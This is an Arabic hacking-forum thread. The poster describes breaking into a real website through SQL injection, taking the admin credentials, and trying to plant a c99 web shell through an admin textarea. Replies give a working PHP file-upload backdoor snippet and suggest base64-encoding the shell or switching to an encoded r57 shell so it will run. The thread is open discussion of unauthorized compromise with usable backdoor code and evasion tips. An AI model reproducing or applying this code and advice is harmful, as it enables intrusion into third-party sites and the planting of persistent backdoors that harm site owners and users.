|
دمج xss مع sql الرجاء الدخول مبتدا او محترف السلام عليكم البارح بينما كنت ابحث في المواقع المصابة بثغرات sql وجدت احد المواقع المصابة وبعد سحب اليوزر والباس من قاعدة البيانات و الدخول بحساب الادمين بحثت كالعادة عن مركز تحميل ملفات فلم اجد :sadwalk: كل ما وجدته كان <textaera> اي ان قالب الصفحة موجود مع مكان لادخال نصوص مفهوم ؟؟ المهم قلت اجرب كود جافا سكريبت و كانني ابحث عن ثغرة xss وضعت الكود فاشتغل مفهوم ؟ المهم قلت لمادا لااضع الشل كاملا فهو في الاساس ليس الا اكواد php\ فتحت شل c99 بالمفكرة و عملت copy و لصقت كود الشل في مكان ادخال النصوص ما رايكم هل اشتغل ؟ الاجابة هي نعم و لا اشتغل و لكن في شكل ازرار مبعثرة و مخربطة في كافة ارجاء الصفحة السوال هل يمكن استعمال هده الطريقة فعلا في حقن الشل و كيف ؟؟؟ |
رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف احذف كود الشل من لوحة التحكم وهذا كود ابلود هيشتغل معاك ان شاء الله كود: |
رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف اقتباس:
ApendiX echo ' '.php_uname().' '; echo ''; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Done The Work!!! '; } else { echo 'Upload Failed! '; } } ?> |
رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف جرب تشفر الكود base64 او شوف شل غير c99 او r57 يكون مشفر وان شاء الله هيشتغل معاك |
| الساعة الآن 12:08 AM |
[ vBspiders.Com Network ]